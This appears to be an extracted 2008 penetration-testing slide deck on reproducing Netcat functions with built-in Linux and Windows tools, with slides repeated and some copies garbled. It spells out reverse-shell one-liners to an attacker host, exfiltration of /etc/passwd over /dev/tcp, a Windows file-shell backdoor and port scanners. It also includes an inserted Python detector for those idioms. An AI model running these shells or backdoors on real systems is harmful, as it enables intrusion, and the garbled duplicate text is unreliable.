Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1 (a Netcat listener on port1)
• Receive output on the attacker's machine on port2 (a second Netcat listener on port2)
  – Only bash's Standard Out flows into the second telnet; add 2>&1 after /bin/bash if error messages should be shipped back as well
Reverse Telnet Shell in Action
[Demo slide; screenshot not reproduced in this text version]
Windows
• The built-in command line has very clunky syntax
• Also, the telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings or command output
• See the first webcast in this series for details on how these work... we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it... When it stops, hit CTRL-] (the telnet escape character) and then type quit to resume
  – Or kill the telnet client every 5 seconds from a separate command prompt (a FOR /L with step 0 loops forever; ping -n 6 127.0.0.1 is a roughly 5-second delay):
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the client-side logging option of the Windows telnet client (-f [filename]) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... it only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
  – Each iteration writes a "Checking Port N" marker to ports.txt and then appends the ftp client's Standard Error, where its connection error messages go, to the same file
  – A port whose marker is not followed by an error message is the one that accepted the connection
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
[Demo slide; screenshot not reproduced in this text version]
Backdoors: The File Shell
• Now let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
  C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
  – The outer FOR /L with step 0 loops forever; ping -n 2 127.0.0.1 adds a roughly one-second pause between polls
  – "delims=^" sets a delimiter that will not normally appear in a command, so %j receives the whole line of commands.txt
  – The file is deleted after execution, so each command runs once
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
The File Shell In Action
[Demo slide; screenshot not reproduced in this text version]
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9, Las Vegas, NV: Skoudis
  – June 12-July 22, Home On-Line: Skoudis
  – July 24-29, Wash DC: Skoudis
  – Aug 11-16, Boston: Shackleford
  – Aug 18-23, Minneapolis: Conrad
  – Aug 24-29, Va Beach: Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now, we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
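As an added example (not code from the original slides), here is the defender's side of the preceding Windows slides: a small detector that runs over process-creation command lines and flags the cmd.exe idioms the deck builds on, covering the file shell above as well as the scripted FTP scanner and the redirect-to-share transfer from the earlier slides. The event format, the rule weights and the sample events are constructed for this example.

```python
"""Flagging the Windows 'Netcat without Netcat' idioms in process-creation logs.

Added example, not from the original slides: takes process command lines (as a
SIEM would receive them from Windows event 4688 or Sysmon event 1) and flags the
cmd.exe idioms the deck relies on: the FOR /L spin loop with a step of 0,
ping -n N 127.0.0.1 used as a sleep, FOR /F feeding a command file to
cmd.exe /c, the FTP client scripted from a just-written command file, and
command output redirected straight onto a UNC share. Event format, rule
weights and sample events are all constructed for this example.
"""
import re

# Rule name -> (weight, compiled pattern over the whole command line).
# Weights are a constructed triage aid, not any vendor's scoring scheme.
RULES = {
    # "for /L %i in (1,0,2)" never terminates: the spin loop behind the
    # file shell (and the telnet-killer loop earlier in the deck).
    "infinite_for_loop": (2, re.compile(
        r"for\s+/L\s+%{1,2}\w+\s+in\s+\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)", re.I)),
    # ping to loopback used purely as a delay inside a loop body.
    "ping_as_sleep": (1, re.compile(
        r"ping\s+-n\s+\d+\s+127\.0\.0\.1", re.I)),
    # FOR /F reading lines from a file and handing each one to cmd.exe /c.
    "file_shell_command_file": (3, re.compile(
        r"for\s+/f\b[^&|]*\bdo\s+cmd(?:\.exe)?\s+/c\s+%{1,2}\w+", re.I)),
    # "echo open <host> <port> > X ... ftp -s:X": the FTP-client scanner.
    "scripted_ftp": (3, re.compile(
        r"echo\s+open\s+\S+\s+\S+\s*>\s*(\S+)\s*&.*\bftp\s+-s:\1", re.I)),
    # Standard Out redirected straight onto \\host\share\...
    "redirect_to_unc_share": (2, re.compile(
        r">>?\s*\\\\[^\\\s]+\\[^\\\s]+\\", re.I)),
}


def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, (_, rx) in RULES.items() if rx.search(cmdline))


def score(cmdline):
    """Sum the weights of the matching rules (0 means nothing suspicious)."""
    return sum(RULES[name][0] for name in classify(cmdline))


def triage(events):
    """Return one finding per event that matches at least one rule.

    Each event is a dict with at least "id" and "cmdline"; findings keep the
    id, add the matching rule names and the summed score, and are ordered
    highest score first so an analyst sees the worst entries at the top.
    """
    findings = []
    for ev in events:
        hits = classify(ev["cmdline"])
        if hits:
            findings.append({"id": ev["id"], "hits": hits,
                             "score": sum(RULES[h][0] for h in hits)})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed sample events, mirroring the deck's own command lines.
SAMPLE_EVENTS = [
    # The file shell: infinite loop, command file fed to cmd /c, ping sleep.
    {"id": 1, "image": "cmd.exe", "cmdline":
        'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in '
        '(commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) '
        '& ping -n 2 127.0.0.1'},
    # The FTP-client port scanner with results appended to ports.txt.
    {"id": 2, "image": "cmd.exe", "cmdline":
        "cmd.exe /c for /L %i in (1,1,1024) do echo Checking Port %i >> "
        "ports.txt & echo open 10.1.1.5 %i > ftp.txt & echo quit >> ftp.txt "
        "& ftp -s:ftp.txt 2>>ports.txt"},
    # Command output redirected across the network onto a share.
    {"id": 3, "image": "cmd.exe", "cmdline":
        r"cmd.exe /c ipconfig /all > \\10.1.1.5\share\out.txt"},
    # Ordinary administration that must not fire: a finite loop with a real
    # ping target, and an interactive FTP session.
    {"id": 4, "image": "cmd.exe", "cmdline":
        "cmd.exe /c for /L %i in (1,1,10) do ping -n 1 10.1.1.%i"},
    {"id": 5, "image": "ftp.exe", "cmdline": "ftp.exe ftp.example.com"},
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f['id']}: score {f['score']}, hits {', '.join(f['hits'])}")
```

The single-rule hits (a lone ping to loopback, one redirect to a share) are deliberately low-weight; the combination in event 1 is what should page someone.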
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home, On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 5
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows
Linux
• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
[Diagram: a firewall blocks incoming connections to the protected server; the protected server runs "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1", the attacker runs "nc -l -p [p]"; commands typed at the attacker's listener are executed on the protected server]
Linux Command-Line Reverse Shell Backdoor In Action
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file
[Screenshot callout: "Port 80 is listening"]
Storing Results and Iterating
• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
Command-Line Port Scanner In Action
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2
Reverse Telnet Shell in Action
Windows
• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings or command output
